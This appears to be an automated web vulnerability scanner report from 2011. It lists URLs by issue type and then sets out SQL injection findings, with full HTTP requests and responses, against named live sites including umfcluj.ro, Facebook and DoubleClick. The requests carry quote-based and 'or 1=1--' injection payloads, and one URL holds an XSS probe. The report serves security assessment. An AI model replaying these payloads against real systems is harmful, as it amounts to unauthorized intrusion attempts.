26.9. http://a2.bing4.com/imagenewsfetcher.aspx

26.10. http://a3.bing4.com/imagenewsfetcher.aspx

26.11. http://a4.bing4.com/imagenewsfetcher.aspx

26.12. http://ad.doubleclick.net/activity

26.13. http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html

26.14. http://ads.undertone.com/l

26.15. http://api.bing.com/qsonhs.aspx

26.16. http://b.scorecardresearch.com/b

26.17. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

26.18. http://bing.fansnap.com/la/pi

26.19. http://blog.linode.com/2011/07/13/introducing-nodebalancer/

26.20. http://boston.com/favicon.ico

26.21. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

26.22. http://cache.boston.com/universal/js/twitterwidget.js

26.23. http://cache.specificmedia.com/creative/blank.gif

26.24. http://cdn.stumble-upon.com/css/global_su.css

26.25. http://cdn.turn.com/server/ddc.htm

26.26. http://cgi.ebay.com/favicon.ico

26.27. http://cheetah.vizu.com/a.gif

26.28. http://cm.g.doubleclick.net/pixel

26.29. http://creatives.as4x.tmcs.net/tmsandbox3a.html

26.30. http://digg.com/ajax/tooltip/submit

26.31. http://farecastcom.122.2o7.net/b/ss/farecastcom/1/H.15.1/s76965045684482

26.32. http://feeds.bbci.co.uk/news/rss.xml

26.33. http://fonts.googleapis.com/css

26.34. http://g-pixel.invitemedia.com/gmatcher

26.35. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052447870/

26.36. http://ibegin.com/

26.37. http://in.getclicky.com/in.php

26.38. http://l.addthiscdn.com/live/t00/250lo.gif

26.39. http://metrics.boston.com/b/ss/nytbglobe/1/H.20.3/s81497499125071

26.40. http://metrics.ticketmaster.com/b/ss/tm-usprod,tm-combinedusprod/1/H.22.1/s82794165948871

26.41. http://metrics.versionone.com/b/ss/vonenewprod/1/H.17/s66275241293478

26.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

26.43. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.44. http://odb.outbrain.com/utils/ping.html

26.45. http://pixel.invitemedia.com/admeld_sync

26.46. http://pixel.quantserve.com/seg/r

26.47. http://profile.live.com/badge

26.48. http://puma.vizu.com/cdn/00/00/21/04/smart_tag.js

26.49. http://r.turn.com/server/pixel.htm

26.50. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977

26.51. http://rover.ebay.com/rover/1/711-53200-19255-0/1

26.52. http://rt.legolas-media.com/lgrt

26.53. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY7LQDIPC0AyoFcNoAAAEyBWzaAAAP

26.54. http://safebrowsing.clients.google.com/safebrowsing/downloads

26.55. http://segment-pixel.invitemedia.com/pixel

26.56. http://srx.main.ebayrtm.com/rtm

26.57. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.58. http://stubhub-www.baynote.net/baynote/tags3/common

26.59. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard

26.60. http://tag.admeld.com/ad/js/610/bostonglobe/728x90/bg_1064637_61606218

26.61. http://themes.googleusercontent.com/font

26.62. http://umfcluj.ro/js/jquery.validate.js

26.63. http://wa.stubhub.com/b/ss/stubhub/1/H.22.1/s88119992504362

26.64. http://www.adminitrack.com/

26.65. http://www.atlassian.com/software/jira

26.66. http://www.axosoft.com/

26.67. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

26.68. http://www.clickmanage.com/events/clickevent.aspx

26.69. http://www.facebook.com/plugins/like.php

26.70. http://www.factset.com/

26.71. http://www.google-analytics.com/__utm.gif

26.72. http://www.googleadservices.com/pagead/conversion/1052447870/

26.73. http://www.ibegin.com/media/site/images/logo.gif

26.74. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

26.75. http://www.linode.com/index.cfm

26.76. http://www.livedrive.com/

26.77. http://www.myspace.com/favicon.ico

26.78. http://www.netlogiq.ro/js/jquery.validate.js

26.79. http://www.numarasoftware.com/welcome/service_desk.aspx

26.80. http://www.rallydev.com/js/scriptaculous.js

26.81. http://www.res-x.com/ws/r2/Resonance.aspx

26.82. http://www.seapine.com/ttpro.html

26.83. http://www.stubhub.com/content/getPromoContent

26.84. http://www.stumbleupon.com/submit

26.85. http://www.techexcel.com/products/devsuite/devteststudio.html

26.86. http://www.ticketmaster.com/event/000043582C516D43

27. Cacheable HTTPS response

27.1. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E

27.2. https://manager.linode.com/session/forgot_save/N

27.3. https://oas.support.discoverbing.com/error.aspx

27.4. https://support.discoverbing.com/Default.aspx

27.5. https://support.microsoft.com/oas/default.aspx

28. HTML does not specify charset

28.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127

28.2. http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html

28.3. http://asset0.zendesk.com/external/zenbox/v2.1/loading.html

28.4. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

28.5. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01

28.6. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01

28.7. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01

28.8. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02

28.9. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96

28.10. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96

28.11. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96

28.12. http://corporate.everydayhealth.com/favicon.ico

28.13. http://creatives.as4x.tmcs.net/tmsandbox3a.html

28.14. http://i3.onlinehelp.microsoft.com/areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css

28.15. http://majornelson.com/favicon.png

28.16. http://now.eloqua.com/visitor/v200/svrGP.aspx

28.17. http://odb.outbrain.com/utils/ping.html

28.18. http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216

28.19. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228

28.20. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228

28.21. http://tm-web2.rondavu.com/com/rondavu/wt/module/static/rondavu_remote.html

28.22. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route

28.23. http://www.bnymellon.com/earnings.html

28.24. http://www.builtritecc.com/

28.25. http://www.gamestop.com/JavaScript/CertonaTable.htm

28.26. http://www.seapine.com/ttpro.html

29. Content type incorrectly stated

29.1. http://a0.twimg.com/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif

29.2. http://a1.twimg.com/profile_images/136003673/bcom_72x72_bigger_normal.gif

29.3. http://admeld.lucidmedia.com/clicksense/admeld/match

29.4. http://answers.microsoft.com/en-us/Site/SetTimeZoneOffset

29.5. http://answers.microsoft.com/en-us/site/resources

29.6. http://api.twitter.com/1/statuses/user_timeline.json

29.7. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02

29.8. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96

29.9. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96

29.10. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96

29.11. http://b3.mookie1.com/favicon.ico

29.12. http://bing.fansnap.com/ejs_templates/seats_page/known_tooltip.ejs

29.13. http://bing.fansnap.com/ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs

29.14. http://bing.fansnap.com/favicon.ico

29.15. http://bing.fansnap.com/seats/ajax/get_vfs_data

29.16. http://charts.edgar-online.com/ext/charts.dll

29.17. http://i3.onlinehelp.microsoft.com/areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css

29.18. http://investor.realnetworks.com/common/images/icon_share.gif

29.19. http://media.gamehouse.com/7/images/favicon.ico

29.20. http://mobile.ebay.com/wp-content/themes/platformpro/images/iconMobileWeb_171x171.png

29.21. http://mobile.ebay.com/wp-content/themes/platformpro/images/imgSubPageContBG.gif

29.22. http://news.google.com/news/xhr/eit

29.23. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.24. http://rac.custhelp.com/ci/browserSearch/desc/http%3A%2F%2Frac.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png

29.25. http://rad.msn.com/ADSAdClient31.dll

29.26. http://real.custhelp.com/ci/browserSearch/desc/http%3A%2F%2Freal.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png

29.27. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard

29.28. http://res.mobileweb.ebay.com/nbinternal/nbblank.gif

29.29. http://sales.liveperson.net/hcp/html/mTag.js

29.30. http://sharethis.com/favicon.ico

29.31. http://stubhub-www.baynote.net/baynote/tags3/common

29.32. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard

29.33. http://superpass.custhelp.com/ci/browserSearch/desc/http%3A%2F%2Fsuperpass.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png

29.34. http://support.microsoft.com/library/images/support/en-AU/askcasey_Btn.gif

29.35. http://support.microsoft.com/library/images/support/en-AU/askcasey_topqa.gif

29.36. https://support.microsoft.com/library/images/support/en-US/IE9_BG-img.jpg

29.37. http://verify.authorize.net/anetseal/images/secure90x72.gif

29.38. http://video.msn.com/services/user/info

29.39. http://waypointlivingspaces.com/sites/default/files/waypoint_favicon.ico

29.40. http://www.atlassian.com/favicon.ico

29.41. http://www.cesal.ro/js/globalizationro-RO.js

29.42. http://www.factset.com/files/xmlfeeds/current.fds

29.43. http://www.fansnap.com/favicon.ico

29.44. http://www.google.com/search

29.45. http://www.googlelabs.com/show_app_thumbnail

29.46. http://www.mookie1.com/favicon.ico

29.47. http://www.netlogiq.ro/ajaxpro/Layout,App_Web_glwxmlys.ashx

29.48. http://www.rallydev.com/favicon.ico

29.49. http://www.res-x.com/ws/r2/Resonance.aspx

29.50. http://www.seapine.com/favicon.ico

29.51. http://www.stubhub.com/content/getPromoContent

29.52. http://www.stubhub.com/favicon.ico

30. Content type is not specified

31. SSL certificate



1. SQL injection  next
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://cm.g.doubleclick.net/pixel [id cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pixel?google_nid=admeld&google_cm&google_sc&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e'

Response 1 (redirected)

HTTP/1.1 302 Found
Location: http://tag.admeld.com/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&google_error=0
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:47:12 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 354
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://tag.admeld.com/match?adme
...[SNIP]...

Request 2

GET /pixel?google_nid=admeld&google_cm&google_sc&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e''

Response 2

HTTP/1.1 302 Found
Location: http://tag.admeld.com/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&external_user_id=CAESEEm-rSLvlOjzT4MOGrRtRVA&google_cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:47:13 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 402
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://tag.admeld.com/match?adme
...[SNIP]...

1.2. http://umfcluj.ro/Detaliu.aspx [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /Detaliu.aspx

Issue detail

The t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Detaliu.aspx?t=Medicina-dentara-Oferta-educationala' HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Studenti-actuali-Prezentare
Cookie: ASP.NET_SessionId=nm2p4tbhojuu3jyfqb310euy; __utma=234819994.717153536.1311096678.1311096678.1311096678.1; __utmb=234819994.1.10.1311096678; __utmc=234819994; __utmz=234819994.1311096678.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:37:31 GMT
Content-Length: 6426

<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Medicina-dentara-Oferta-educationala'' &nbsp;group by YEAR(StartDate), MONTH(StartDa' at line 4</titl
...[SNIP]...

Request 2

GET /Detaliu.aspx?t=Medicina-dentara-Oferta-educationala'' HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Studenti-actuali-Prezentare
Cookie: ASP.NET_SessionId=nm2p4tbhojuu3jyfqb310euy; __utma=234819994.717153536.1311096678.1311096678.1311096678.1; __utmb=234819994.1.10.1311096678; __utmc=234819994; __utmz=234819994.1311096678.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:37:34 GMT
Content-Length: 59690


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...

1.3. http://umfcluj.ro/lista.aspx [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /lista.aspx?t=Admitere-Prezentare' HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.1.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:57 GMT
Content-Length: 6990

<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ro-RO'<br>    WHERE Type = 'Admit
...[SNIP]...

Request 2

GET /lista.aspx?t=Admitere-Prezentare'' HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.1.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:59 GMT
Content-Length: 78615


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...

1.4. http://www.facebook.com/plugins/like.php [datr cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 30846501'%20or%201%3d1--%20 and 30846501'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&layout=standard&show_faces=false&width=425&font=arial&colorscheme=light&ref=blogindex HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb30846501'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.148.39
X-Cnection: close
Date: Tue, 19 Jul 2011 20:45:03 GMT
Content-Length: 25038

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title><style>body{background:#fff;font-size: 11px;font-family:"lucida grande",tahoma,verdana,arial,sans-serif;color:#333;margin:0;padding:0;text-align:left;direction:ltr;unicode-bidi:embed}
h1, h2, h3, h4, h5, h6{font-size: 13px;color:#333;margin:0;padding:0}
h1{font-size: 14px}
h4, h5{font-size: 11px}
p{margin:1em 0}
a{cursor:pointer;color:#3b5998;-moz-outline-style:none;text-decoration:none}
a:hover{text-decoration:underline}
img{border:0}
td,
td.label{font-size: 11px;text-align:left}
dd{color:#000}
dt{color:#777}
ul{list-style-type:none;margin:0;padding:0}
abbr{border-bottom:none}
hr{background:#d9d9d9;border-width:0;color:#d9d9d9;height:1px}
.clearfix:after{clear:both;content:".";display:block;font-size:0;height:0;line-height:0;visibility:hidden}
.clearfix{display:block;zoom:1}
.datawrap{word-wrap:break-word}
.word_break{display:block;float:left;margin-left:-10px;padding:0}
.img_loading{position:absolute;left:-100000px;top:-100000px}
.aero{opacity:.5}
.column{float:left}
.center{margin-left:auto;margin-right:auto}
#facebook .hidden_elem{display:none !important}
#facebook .invisible_elem{visibility:hidden}
.direction_ltr{direction:ltr}
.direction_rtl{direction:rtl}
.text_align_ltr{text-align:left}
.text_align_rtl{text-align:right}
body.plugin{background:transparent;overflow-y:visible}
body.transparent_widget{background-color:transparent;overflow:hidden}
body.plugin.transparent_widget{overflow-y:hidden}
.connect_widget{background-color:transparent}
.connect_widget .connect_widget_facebook_favicon{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png) no-repeat -1px -47px transparent;display:block;height:14px;padding:0 0 0 0;width:14px;position:absolute;left:-1px}
.connect_widget .connect_widget_interactive_area{border-collapse:collapse}
.connect_widget td.connect_widget_vertical_center{border-spacing:0;font-size: 11px;line-height:normal;padding:0}
.connect_widget td.connect_widget_button_cell{vertical-align:top}
.connect_widget td.connect_widget_co
...[SNIP]...

Request 2

GET /plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&layout=standard&show_faces=false&width=425&font=arial&colorscheme=light&ref=blogindex HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb30846501'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.149.54
X-Cnection: close
Date: Tue, 19 Jul 2011 20:45:04 GMT
Content-Length: 6617

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/zHNaHvAFp7N.css" />
